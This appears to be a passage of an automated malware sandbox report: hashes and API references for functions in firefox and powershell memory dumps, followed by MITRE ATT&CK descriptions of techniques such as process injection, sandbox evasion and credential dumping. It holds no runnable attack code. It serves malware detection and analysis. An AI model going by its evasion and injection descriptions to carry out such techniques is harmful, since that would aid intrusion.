Opcode Fuzzy Hash: 77babcb5dd191f7b4d1a8e2aa50198d3ad3e53afbc95dcd1b3410ec74f42e3af
Instruction Fuzzy Hash: 971133B58003488FCB60EF9AD548B9EFBF4EB48310F208459E519A7300C375A944CFA1

Function 06F15718 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 06F1577D

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 96b98a1a858a89ac2dd1e4fa638f7fd4bc36b685c37e74928963c221cb6fb112
Instruction ID: 13ead08ef9876b3c54d0d1111580f54381b6dbfc53cc63155d2b3b3b2402c021
Opcode Fuzzy Hash: 96b98a1a858a89ac2dd1e4fa638f7fd4bc36b685c37e74928963c221cb6fb112
Instruction Fuzzy Hash: 8D1136B5800349CFDB10CF99D645BDEFBF4EB48320F14845AD968A7650C379A584CFA1

Function 06F1F583 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06F1EB47), ref: 06F1F5E5

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 273b9cb0ad0c85613c539fc3b370438b8151656fd0f35b1b53a8906d3f2062cf
Instruction ID: 3651d0249c90ca72a7a858a4a35614a868eef75075c07cd566bac904c97acb2f
Opcode Fuzzy Hash: 273b9cb0ad0c85613c539fc3b370438b8151656fd0f35b1b53a8906d3f2062cf
Instruction Fuzzy Hash: 6F11D0B5C046899FCB10DF9AE944BDEFBF4EB48324F10845AE419B7210D379A544CFA5

Function 06F17060 Relevance: 1.5, APIs: 1, Instructions: 40comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06F170BD

Memory Dump Source

Source File: 0000000B.00000002.2558185850.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6f10000_firefox.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ee0bd79d8d2d32b6f50a1b1eeffa67a655ed07c70a1db81e76d33dd627203916
Instruction ID: 71329acd2271ae5e7785020720322093820d25a629b07a8cc13aa67436be6d3e
Opcode Fuzzy Hash: ee0bd79d8d2d32b6f50a1b1eeffa67a655ed07c70a1db81e76d33dd627203916
Instruction Fuzzy Hash: B01142B5D04349CFCB20DFA9D64578EFBF1AB48320F20881AD569A7250C379A544CFA1

Function 0095D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2532136139.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_95d000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f372a961dafcb6aa99a82a1534fa1bd74411a71f82e09d91953082c1cc97c81a
Instruction ID: c4506ee63907843b38078cd907e79ce84b233964ec7a15bc4c0a4e6311e65517
Opcode Fuzzy Hash: f372a961dafcb6aa99a82a1534fa1bd74411a71f82e09d91953082c1cc97c81a
Instruction Fuzzy Hash: E2213A71504204DFDB15DF15D9C0B26BF69FB98315F20C569ED090B2AAC33AE85AC7A2

Function 0096D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2532283007.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_96d000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b71999d8f1e14ce3228754edec7f354b22bfc80158fb4c7ac3bf0d9d4370dab
Instruction ID: ca363a0a13915941aa8927c9839d79f36501b5595fb517c89b24e67ce29b1ee2
Opcode Fuzzy Hash: 4b71999d8f1e14ce3228754edec7f354b22bfc80158fb4c7ac3bf0d9d4370dab
Instruction Fuzzy Hash: FB21F275A04244DFDB14DF14D984B26BB69EB88314F24C969E81A4B296C33BD807CAA1

Function 0096D2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2532283007.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_96d000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74da8bd06b9a03f602553836069620301af3ed3b8450c9a634fb65cfb861c1a7
Instruction ID: 7f9f59dd779e6833b340462142a84d3a0386cee21f8511514563036bc0797d6f
Opcode Fuzzy Hash: 74da8bd06b9a03f602553836069620301af3ed3b8450c9a634fb65cfb861c1a7
Instruction Fuzzy Hash: 77210875A05244DFDB04DF14D5C0F2ABB69FB88328F24C569E8590B345C37AD806CAA2

Function 0096D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2532283007.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_96d000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c945a76c97895c45c42e69baa75fcef6f0c36b8dcc33246a90f0407694a0d9c6
Instruction ID: 0ef78849bbb1b96aaf70c1a99741554cae8c9629f9210dda755088280e266017
Opcode Fuzzy Hash: c945a76c97895c45c42e69baa75fcef6f0c36b8dcc33246a90f0407694a0d9c6
Instruction Fuzzy Hash: 92215E755093808FDB12CF24D994B15BF71EB46314F29C5EAD8498F6A7C33A980ACB62

Function 0095D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2532136139.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_95d000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction ID: d9222a9a17dc424357158cfdd41bedfe2e77eb13d86c9a173234494e2f4832cb
Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction Fuzzy Hash: C911E172404240CFDB16CF00D5C4B16BF72FB94324F24C2A9DC090B266C33AE85ACBA1

Function 0096D2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2532283007.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_96d000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c97d5b1cbfc5ae5835a6066c3a266f817fddfa279b37b7c916b6a5cfd3dcaf6
Instruction ID: f42e87f211be2e1a3cc89844e90378b9a9a8c7dda396d7339532d9b4fb914199
Opcode Fuzzy Hash: 6c97d5b1cbfc5ae5835a6066c3a266f817fddfa279b37b7c916b6a5cfd3dcaf6
Instruction Fuzzy Hash: 1711B275905284CFDB15CF14D5C4B19FB61FB84328F24C6AAD8494B756C33AD80ACB92

Function 06C604AA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2558082735.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c60000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b19cb363849cb4cf1714496b7a3f25fab79f9fc6f4fe5b4b78d4d08a179899
Instruction ID: 097caafd3760f9f43e7a5c1d79c4258e950f580196da2200b76850d250778c12
Opcode Fuzzy Hash: 34b19cb363849cb4cf1714496b7a3f25fab79f9fc6f4fe5b4b78d4d08a179899
Instruction Fuzzy Hash: 6CE0E530A4425ACBEBB49B11CE9DBBDB771BB84304F0085AAD51B76291CBB40EC4CF84

Analysis Process: powershell.exePID: 6912, Parent PID: 8120COMMON

Executed Functions

Function 02CF7B08 Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1459538523.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8549776196f097dbac9fe97c0d3d4bd1f2a803fa6fdfdc0d2297292d1e192165
Instruction ID: ca9f1ed90929cfdd67da04574f034c8f96892b4b84eb31445c5f1e6fdba5d927
Opcode Fuzzy Hash: 8549776196f097dbac9fe97c0d3d4bd1f2a803fa6fdfdc0d2297292d1e192165
Instruction Fuzzy Hash: 00321934A012099FDB95DFA8D484A9DFBF2BF88310F25C159E904AB365C731ED86CB90

Function 07471810 Relevance: 5.6, Strings: 4, Instructions: 588COMMON

Download Yara Rule

Strings

4'_q, xrefs: 07471CB2
4'_q, xrefs: 07471B4E
4'_q, xrefs: 07471B58
4'_q, xrefs: 07471CA8

Memory Dump Source

Source File: 0000000E.00000002.1485169571.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'_q$4'_q$4'_q$4'_q
API String ID: 0-4157139909
Opcode ID: ea6b3af0cb42ef7d4ebddb222da3cf56fdcfba305626ea84bf9747fb2107c8d5
Instruction ID: 44d68068970877bbc37f9f6b4dd0310b5d052a57233aa9ca64e0d941fda05ada
Opcode Fuzzy Hash: ea6b3af0cb42ef7d4ebddb222da3cf56fdcfba305626ea84bf9747fb2107c8d5
Instruction Fuzzy Hash: B31245B1B0434A9FDB159B7998117FBBBA2AFC2210F14C4ABD405DB345DB35C846CBA2

Function 02CF9158 Relevance: 1.4, Instructions: 1435COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1459538523.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66dc88c1432335d52b79d35f7edabf02d03447083fb0878ea2a4aaa5ff392d47
Instruction ID: 88c4c8fbfd3038794207249ff79a96162034590d2de2fc592b2a8359ab859606
Opcode Fuzzy Hash: 66dc88c1432335d52b79d35f7edabf02d03447083fb0878ea2a4aaa5ff392d47
Instruction Fuzzy Hash: CF022B74A012099FDF95CF98C584AAEFBB2FF88314F248159E905AB365C731ED85CB90

Function 02CF6BA8 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1459538523.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ef2d8a48c79665a9678c34b85dff2c5ab7a84fdb49e91d4ed2af6146229f47
Instruction ID: 1848a9cee26690dee1a7b1428da3425aaa5da43f57933d5bcf86a6ccc7ed2390
Opcode Fuzzy Hash: 59ef2d8a48c79665a9678c34b85dff2c5ab7a84fdb49e91d4ed2af6146229f47
Instruction Fuzzy Hash: E591D134A00248DFCB45CF69D4809AEBBF6FF89314F2480A9E554AB362D735ED45CBA0

Function 074717F5 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1485169571.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 350145142a4904ac626cd446eadbad17909a6a4984a3395155d331712a659062
Instruction ID: fcd5551dce3f676a27529ee94db50ace35d640d25c8c392450b37f3e1aec828f
Opcode Fuzzy Hash: 350145142a4904ac626cd446eadbad17909a6a4984a3395155d331712a659062
Instruction Fuzzy Hash: A74127F1B0420A9BDB208E2589017EBBBB2AFC2214F158497D9009B346D735D946CBA3

Function 02CF7660 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1459538523.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17dc8c25a7d291d51ae2ee87bbe20204e8fc6747a70831a61b3491cec3f9d499
Instruction ID: 4c0a87151e0b5124d2ce94da822ff9a7e906076d2610a1728ccf1554fc1109fa
Opcode Fuzzy Hash: 17dc8c25a7d291d51ae2ee87bbe20204e8fc6747a70831a61b3491cec3f9d499
Instruction Fuzzy Hash: 6331A374A0A3959FC702DB6CC8909DABFB0EF4A310B0540D7D445DB366C339E849CBA1

Function 02CF9148 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1459538523.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b1190c97553bc9949c1a20519eb690515df7116befe74aa378fb6c72c9995e0
Instruction ID: 44d5b4cc73563388f9e4f7a2d91f0f6440d883d48f84425c6ca76785dd3c40fd
Opcode Fuzzy Hash: 5b1190c97553bc9949c1a20519eb690515df7116befe74aa378fb6c72c9995e0
Instruction Fuzzy Hash: B821FA74A005099FCB54CF99C984EAAFBF1FF88310F158569E919A7361C731ED51CB90

Function 02CF7650 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1459538523.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13fff7cd37e4e0952ca2c46e4322dd5e0ea78a034100467d191a334cdb06a3dc
Instruction ID: 1f431793af221d544eb17188c1c7e1300c0a217e9fe835fb178e5f38dad7e26d
Opcode Fuzzy Hash: 13fff7cd37e4e0952ca2c46e4322dd5e0ea78a034100467d191a334cdb06a3dc
Instruction Fuzzy Hash: 7B210874A002099FCB40DF98D4809AEFBF5FF89310B1584AAE909A7351D335ED45CBA1

Function 02B8D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1458746688.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2b8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36be59ed81f6a581eb8baf867ac76a4e79a26b88e691e0a1d9c8e46b246c78ed
Instruction ID: 7560e724f6b0372034ae3436ff92d3c3f4c7693fa005946cd08c911d0c5af446
Opcode Fuzzy Hash: 36be59ed81f6a581eb8baf867ac76a4e79a26b88e691e0a1d9c8e46b246c78ed
Instruction Fuzzy Hash: F4012671104305AAE720AB39DD94B67BF98EF41324F18C4ABEC0C4B2C6C3799842C6B1

Function 02B8D006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1458746688.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2b8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de06f15006f8de37a6a723e4f101791532ea162de8ea3b1fc34e2c43251252b4
Instruction ID: 4d027fbfa4cc5f16984d3926ff59b5d1fb4b360ebf67a915f0aa3a41473b650a
Opcode Fuzzy Hash: de06f15006f8de37a6a723e4f101791532ea162de8ea3b1fc34e2c43251252b4
Instruction Fuzzy Hash: 7201526150E3C09FD7124B258C94B62BFB4DF52224F1984DBD8888F1D7C2699845C772

Function 02CF2C06 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1459538523.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ebb21c9b51c7929fa61212b4ac55aaec06fe1fe71ecfc31c03f89ff6567b40
Instruction ID: cece4476f0e0eda176aa09ba121219bd2da0b82deeea750e5375885f9867c810
Opcode Fuzzy Hash: 48ebb21c9b51c7929fa61212b4ac55aaec06fe1fe71ecfc31c03f89ff6567b40
Instruction Fuzzy Hash: 81F03435A000089FCB05CF9CD890AEEF7B1FF88324F208199E515A72A0C732AC52CB60

Non-executed Functions

Function 07471450 Relevance: 10.3, Strings: 8, Instructions: 331COMMON

Download Yara Rule

Strings

4'_q, xrefs: 0747165D
tP_q, xrefs: 074714CD
$_q, xrefs: 07471494
$_q, xrefs: 07471736
4'_q, xrefs: 07471651
$_q, xrefs: 07471462
tP_q, xrefs: 074714D9
$_q, xrefs: 07471488

Memory Dump Source

Source File: 0000000E.00000002.1485169571.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q$$_q
API String ID: 0-574570645
Opcode ID: 6fb0d7bdfc22583d6147321e6cef6a023b920ecad53252a7fc695a2f8729e7bc
Instruction ID: 856dbd691fdd9d93bda97a056125b242de15b1b55d97c9d739ac46bdb9db7463
Opcode Fuzzy Hash: 6fb0d7bdfc22583d6147321e6cef6a023b920ecad53252a7fc695a2f8729e7bc
Instruction Fuzzy Hash: 15A157B17043499FD7259A7998007E7BBF6AFC2220F28C46BE445CB352DA35CC46C7A2

Function 07470550 Relevance: 9.1, Strings: 7, Instructions: 322COMMON

Download Yara Rule

Strings

$_q, xrefs: 07470764
tP_q, xrefs: 0747079D
$_q, xrefs: 07470732
tP_q, xrefs: 074707A9
$_q, xrefs: 07470758
4'_q, xrefs: 0747065F
4'_q, xrefs: 07470653

Memory Dump Source

Source File: 0000000E.00000002.1485169571.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q
API String ID: 0-3731700880
Opcode ID: db366ac05ad94f9ea84651287ec0dd57efea5bfd85cd322ff8cd70c0f73f2b4e
Instruction ID: cb1de941c3f50a0d027a8e5fb8ba290d33162f09471a051f2407ae40f9efbe2e
Opcode Fuzzy Hash: db366ac05ad94f9ea84651287ec0dd57efea5bfd85cd322ff8cd70c0f73f2b4e
Instruction Fuzzy Hash: 3BA157B17053428FD7259A7998106F7BBA6AFC2210F1884ABD445CB3A1DB35DC42C7A2

Function 074711A0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

$_q, xrefs: 0747135E
$_q, xrefs: 07471352
$_q, xrefs: 07471327
4'_q, xrefs: 07471256
4'_q, xrefs: 0747124A

Memory Dump Source

Source File: 0000000E.00000002.1485169571.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'_q$4'_q$$_q$$_q$$_q
API String ID: 0-4191971291
Opcode ID: 4fc48ca00532b2a6580a34765a0fa3bc676ee34c25b7e59369d4fae0bff6ab2d
Instruction ID: 6fa057f307f73ef85a97e52ab6a006a4c2c3923829473a6f14176092af6e2b05
Opcode Fuzzy Hash: 4fc48ca00532b2a6580a34765a0fa3bc676ee34c25b7e59369d4fae0bff6ab2d
Instruction Fuzzy Hash: 565179B170430EDFEB255A7998002EBBBF6AFC2611F28847BD445DB341DA35C846C7A2

Function 074732B0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$_q, xrefs: 074732C2
$_q, xrefs: 0747330C
$_q, xrefs: 074732DE
$_q, xrefs: 07473318

Memory Dump Source

Source File: 0000000E.00000002.1485169571.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: $_q$$_q$$_q$$_q
API String ID: 0-1171383116
Opcode ID: cb46852b2d773535769f1b84f18a925f3fce607d23c07e1bc45a12eecb9d05b7
Instruction ID: e8b06de84dd95046b07d81adb120a5dcc54b318d01abd95c71f038db8adaee72
Opcode Fuzzy Hash: cb46852b2d773535769f1b84f18a925f3fce607d23c07e1bc45a12eecb9d05b7
Instruction Fuzzy Hash: 96217DB1310396ABEB349E7E8804BE7B7DA9BC0715F24882BD409CB381DD76C845D361

Function 07470309 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

4'_q, xrefs: 07470373
4'_q, xrefs: 0747037F
$_q, xrefs: 07470352
$_q, xrefs: 0747035E

Memory Dump Source

Source File: 0000000E.00000002.1485169571.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7470000_powershell.jbxd

Similarity

API ID:
String ID: 4'_q$4'_q$$_q$$_q
API String ID: 0-1173716036
Opcode ID: 84e4ddfb3e4ee841626d58243d9838542306b920c91dbd5a42ec17c7e70992d5
Instruction ID: 770f99cc39414aa6f4244deab5fa75e80a95e3fdcfc6c7ea1171a4724499908b
Opcode Fuzzy Hash: 84e4ddfb3e4ee841626d58243d9838542306b920c91dbd5a42ec17c7e70992d5
Instruction Fuzzy Hash: FF0184A170A3964FC32B122919201966FB65BC3A5072945DBC081DF267CD588C4AC3B3

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

